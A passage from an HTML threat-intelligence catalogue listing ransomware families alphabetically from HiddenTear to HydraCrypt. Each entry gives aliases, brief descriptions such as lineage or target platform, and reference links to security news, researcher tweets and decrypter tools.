</table>
</div>
<div class="sect2">
<h3 id="_hiddentear"><a class="anchor" href="#_hiddentear"></a><a class="link" href="#_hiddentear">HiddenTear</a></h3>
<div class="paragraph">
<p>Ransomware Open sourced C#</p>
</div>
<div class="paragraph">
<p>HiddenTear is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cryptear</p>
</li>
<li>
<p>EDA2</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1977. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.utkusen.com/blog/dealing-with-script-kiddies-cryptear-b-incident.html">http://www.utkusen.com/blog/dealing-with-script-kiddies-cryptear-b-incident.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_educrypt"><a class="anchor" href="#_educrypt"></a><a class="link" href="#_educrypt">EduCrypt</a></h3>
<div class="paragraph">
<p>Ransomware Based on Hidden Tear</p>
</div>
<div class="paragraph">
<p>EduCrypt is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>EduCrypter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1978. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.filedropper.com/decrypter_1">http://www.filedropper.com/decrypter_1</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/747031171347910656">https://twitter.com/JakubKroustek/status/747031171347910656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_eitest"><a class="anchor" href="#_eitest"></a><a class="link" href="#_eitest">EiTest</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1979. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BroadAnalysis/status/845688819533930497">https://twitter.com/BroadAnalysis/status/845688819533930497</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/845652520202616832">https://twitter.com/malwrhunterteam/status/845652520202616832</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_el_polocker"><a class="anchor" href="#_el_polocker"></a><a class="link" href="#_el_polocker">El-Polocker</a></h3>
<div class="paragraph">
<p>Ransomware Has a GUI</p>
</div>
<div class="paragraph">
<p>El-Polocker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Los Pollos Hermanos</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_encoder_xxxx"><a class="anchor" href="#_encoder_xxxx"></a><a class="link" href="#_encoder_xxxx">Encoder.xxxx</a></h3>
<div class="paragraph">
<p>Ransomware Coded in GO</p>
</div>
<div class="paragraph">
<p>Encoder.xxxx is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan.Encoder.6491</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1980. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/">http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://vms.drweb.ru/virus/?_is=1&amp;i=8747343">http://vms.drweb.ru/virus/?_is=1&amp;i=8747343</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_encryptojjs"><a class="anchor" href="#_encryptojjs"></a><a class="link" href="#_encryptojjs">encryptoJJS</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_enigma"><a class="anchor" href="#_enigma"></a><a class="link" href="#_enigma">Enigma</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1981. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-enigma-ransomware-targets-russian-speaking-users/">http://www.bleepingcomputer.com/news/security/the-enigma-ransomware-targets-russian-speaking-users/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enjey"><a class="anchor" href="#_enjey"></a><a class="link" href="#_enjey">Enjey</a></h3>
<div class="paragraph">
<p>Ransomware Based on RemindMe</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1982. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/839022018230112256">https://twitter.com/malwrhunterteam/status/839022018230112256</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fairware"><a class="anchor" href="#_fairware"></a><a class="link" href="#_fairware">Fairware</a></h3>
<div class="paragraph">
<p>Ransomware Target Linux O.S.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1983. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/">http://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakben"><a class="anchor" href="#_fakben"></a><a class="link" href="#_fakben">Fakben</a></h3>
<div class="paragraph">
<p>Ransomware Based on Hidden Tear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1984. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/post/fakben-team-ransomware-uses-open-source-hidden-tear-code">https://blog.fortinet.com/post/fakben-team-ransomware-uses-open-source-hidden-tear-code</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakecryptolocker"><a class="anchor" href="#_fakecryptolocker"></a><a class="link" href="#_fakecryptolocker">FakeCryptoLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1985. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/812312402779836416">https://twitter.com/PolarToffee/status/812312402779836416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fantom"><a class="anchor" href="#_fantom"></a><a class="link" href="#_fantom">Fantom</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<div class="paragraph">
<p>Fantom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Comrad Circle</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1986. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/">http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fenixlocker"><a class="anchor" href="#_fenixlocker"></a><a class="link" href="#_fenixlocker">FenixLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1987. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/fenixlocker">https://decrypter.emsisoft.com/fenixlocker</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/fwosar/status/777197255057084416">https://twitter.com/fwosar/status/777197255057084416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_frozr"><a class="anchor" href="#_file_frozr"></a><a class="link" href="#_file_frozr">FILE FROZR</a></h3>
<div class="paragraph">
<p>Ransomware RaaS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1988. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/rommeljoven17/status/846973265650335744">https://twitter.com/rommeljoven17/status/846973265650335744</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_filelocker"><a class="anchor" href="#_filelocker"></a><a class="link" href="#_filelocker">FileLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1989. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/836616468775251968">https://twitter.com/jiriatvirlab/status/836616468775251968</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_firecrypt"><a class="anchor" href="#_firecrypt"></a><a class="link" href="#_firecrypt">FireCrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1990. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/">https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flyper"><a class="anchor" href="#_flyper"></a><a class="link" href="#_flyper">Flyper</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2 / HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1991. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/773771485643149312">https://twitter.com/malwrhunterteam/status/773771485643149312</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fonco"><a class="anchor" href="#_fonco"></a><a class="link" href="#_fonco">Fonco</a></h3>
<div class="paragraph">
<p>Ransomware contact email <a href="mailto:safefiles32@mail.ru">safefiles32@mail.ru</a> also as prefix in encrypted file contents</p>
</div>
</div>
<div class="sect2">
<h3 id="_fortunecookie"><a class="anchor" href="#_fortunecookie"></a><a class="link" href="#_fortunecookie">FortuneCookie</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1992. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/842302481774321664">https://twitter.com/struppigel/status/842302481774321664</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_free_freedom"><a class="anchor" href="#_free_freedom"></a><a class="link" href="#_free_freedom">Free-Freedom</a></h3>
<div class="paragraph">
<p>Ransomware Unlock code is: adam or adamdude9</p>
</div>
<div class="paragraph">
<p>Free-Freedom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Roga</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1993. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/812135608374226944">https://twitter.com/BleepinComputer/status/812135608374226944</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fsociety"><a class="anchor" href="#_fsociety"></a><a class="link" href="#_fsociety">FSociety</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2 and RemindMe</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1994. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/628199/fs0ciety-locker-ransomware-help-support-fs0cietyhtml/">https://www.bleepingcomputer.com/forums/t/628199/fs0ciety-locker-ransomware-help-support-fs0cietyhtml/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-fsociety-ransomware-pays-homage-to-mr-robot/">http://www.bleepingcomputer.com/news/security/new-fsociety-ransomware-pays-homage-to-mr-robot/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/siri_urz/status/795969998707720193">https://twitter.com/siri_urz/status/795969998707720193</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fury"><a class="anchor" href="#_fury"></a><a class="link" href="#_fury">Fury</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1995. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghostcrypt"><a class="anchor" href="#_ghostcrypt"></a><a class="link" href="#_ghostcrypt">GhostCrypt</a></h3>
<div class="paragraph">
<p>Ransomware Based on Hidden Tear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1996. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/614197/ghostcrypt-z81928819-help-support-topic-read-this-filetxt/">http://www.bleepingcomputer.com/forums/t/614197/ghostcrypt-z81928819-help-support-topic-read-this-filetxt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gingerbread"><a class="anchor" href="#_gingerbread"></a><a class="link" href="#_gingerbread">Gingerbread</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1997. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/ni_fi_70/status/796353782699425792">https://twitter.com/ni_fi_70/status/796353782699425792</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_globe_v1"><a class="anchor" href="#_globe_v1"></a><a class="link" href="#_globe_v1">Globe v1</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Globe v1 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Purge</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1998. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221">https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/">http://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gnl_locker"><a class="anchor" href="#_gnl_locker"></a><a class="link" href="#_gnl_locker">GNL Locker</a></h3>
<div class="paragraph">
<p>Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1999. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/">http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gomasom"><a class="anchor" href="#_gomasom"></a><a class="link" href="#_gomasom">Gomasom</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2000. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goopic"><a class="anchor" href="#_goopic"></a><a class="link" href="#_goopic">Goopic</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2001. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/">http://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gopher"><a class="anchor" href="#_gopher"></a><a class="link" href="#_gopher">Gopher</a></h3>
<div class="paragraph">
<p>Ransomware OS X ransomware (PoC)</p>
</div>
</div>
<div class="sect2">
<h3 id="_hacked"><a class="anchor" href="#_hacked"></a><a class="link" href="#_hacked">Hacked</a></h3>
<div class="paragraph">
<p>Ransomware Jigsaw Ransomware variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2002. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/806878803507101696">https://twitter.com/demonslay335/status/806878803507101696</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_happydayzz"><a class="anchor" href="#_happydayzz"></a><a class="link" href="#_happydayzz">HappyDayzz</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2003. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/847114064224497666">https://twitter.com/malwrhunterteam/status/847114064224497666</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_harasom"><a class="anchor" href="#_harasom"></a><a class="link" href="#_harasom">Harasom</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2004. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hddcryptor"><a class="anchor" href="#_hddcryptor"></a><a class="link" href="#_hddcryptor">HDDCryptor</a></h3>
<div class="paragraph">
<p>Ransomware Uses <a href="https://diskcryptor.net" class="bare">https://diskcryptor.net</a> for full disk encryption</p>
</div>
<div class="paragraph">
<p>HDDCryptor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Mamba</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2005. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho">https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/[blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_heimdall"><a class="anchor" href="#_heimdall"></a><a class="link" href="#_heimdall">Heimdall</a></h3>
<div class="paragraph">
<p>Ransomware File marker: "Heimdall---"</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2006. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/heimdall-open-source-php-ransomware-targets-web-servers/">https://www.bleepingcomputer.com/news/security/heimdall-open-source-php-ransomware-targets-web-servers/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_help_dcfile"><a class="anchor" href="#_help_dcfile"></a><a class="link" href="#_help_dcfile">Help_dcfile</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_herbst"><a class="anchor" href="#_herbst"></a><a class="link" href="#_herbst">Herbst</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2007. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware">https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hi_buddy"><a class="anchor" href="#_hi_buddy"></a><a class="link" href="#_hi_buddy">Hi Buddy!</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2008. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/hibuddy.html">http://www.nyxbone.com/malware/hibuddy.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hitler"><a class="anchor" href="#_hitler"></a><a class="link" href="#_hitler">Hitler</a></h3>
<div class="paragraph">
<p>Ransomware Deletes files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2009. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/development-version-of-the-hitler-ransomware-discovered/">http://www.bleepingcomputer.com/news/security/development-version-of-the-hitler-ransomware-discovered/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/825310545800740864">https://twitter.com/jiriatvirlab/status/825310545800740864</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_holycrypt"><a class="anchor" href="#_holycrypt"></a><a class="link" href="#_holycrypt">HolyCrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2010. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-python-ransomware-called-holycrypt-discovered/">http://www.bleepingcomputer.com/news/security/new-python-ransomware-called-holycrypt-discovered/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_htcryptor"><a class="anchor" href="#_htcryptor"></a><a class="link" href="#_htcryptor">HTCryptor</a></h3>
<div class="paragraph">
<p>Ransomware Includes a feature to disable the victim&#8217;s windows firewall Modified in-dev HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2011. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/803288396814839808">https://twitter.com/BleepinComputer/status/803288396814839808</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hydracrypt"><a class="anchor" href="#_hydracrypt"></a><a class="link" href="#_hydracrypt">HydraCrypt</a></h3>
<div class="paragraph">
<p>Ransomware CrypBoss Family</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2012. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malware-traffic-analysis.net/2016/02/03/index2.html">http://www.malware-traffic-analysis.net/2016/02/03/index2.html</a></p></td>
</tr>
</tbody>
